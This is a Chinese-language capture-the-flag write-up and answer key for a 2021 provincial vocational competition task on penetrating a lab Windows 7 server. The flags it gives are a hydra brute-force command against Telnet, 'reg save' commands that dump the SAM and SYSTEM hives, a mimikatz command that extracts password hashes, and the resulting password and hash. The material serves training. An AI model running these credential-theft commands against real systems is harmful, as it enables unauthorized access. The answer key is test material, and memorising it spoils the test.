2021年山东省中职组网络安全省赛B模块windows渗透解析

B-10任务十：Windows操作系统渗透测试任务环境说明：●服务器场景：Server2（封闭链接）●服务器场景操作系统：Windows7

1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试，并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交；

首先第一道题目就非常简单，直接使用nmap -sV 版本扫描进行得出flag:

Flag:23

2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试，使用kali中hydra对服务器Telnet服务进行暴力破解（用户名为Administrator），将hydra使用的必要参数当做FLAG进行提交（例：nmap-s-p22）；（字典路径/usr/share/wordlists/dirb/small.txt）

这一道题目那就使用hydra指定字典进行爆破：

Flag: hydra -l Administrator -P /usr/share/wordlists/dirb/small.txt 192.168.70.136 telnet

3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试，使用kali中hydra对服务器Telnet服务进行暴力破解（用户名为Administrator），将破解成功的密码当做FLAG进行提交；（字典路径/usr/share/wordlists/dirb/small.txt）

根据上面的题目：

Flag:123

4.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试，取得的账户密码有远程桌面权限，将该场景系统中sam文件使用reg相关命令提取，将完整命令作为FLAG提交；

成功导出：

Flag:reg save HKLM\SAM sam.hive

5.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试，取得的账户密码有远程桌面权限，将该场景系统中system文件使用reg相关命令提取，将完整命令作为FLAG提交；

根据上一道题目：

Flag:reg save HKLM\SYSTEM system.hiv

6.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试，将sam文件与system文件提取到本地，使用桌面mimikatz工具提取Administrator密码信息，将提取信息的命令作为FLAG提交;

Flag: lsadump::sam /sam:C:\sam.hive /system:C:\system.hiv

7.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试，将sam文件与system文件提取到本地，使用桌面mimikatz工具提取administrators密码信息，将提取到的hash值作为FLAG提交

上一道题目得出：

Flag: 3dbde697d71690a769204beb12283678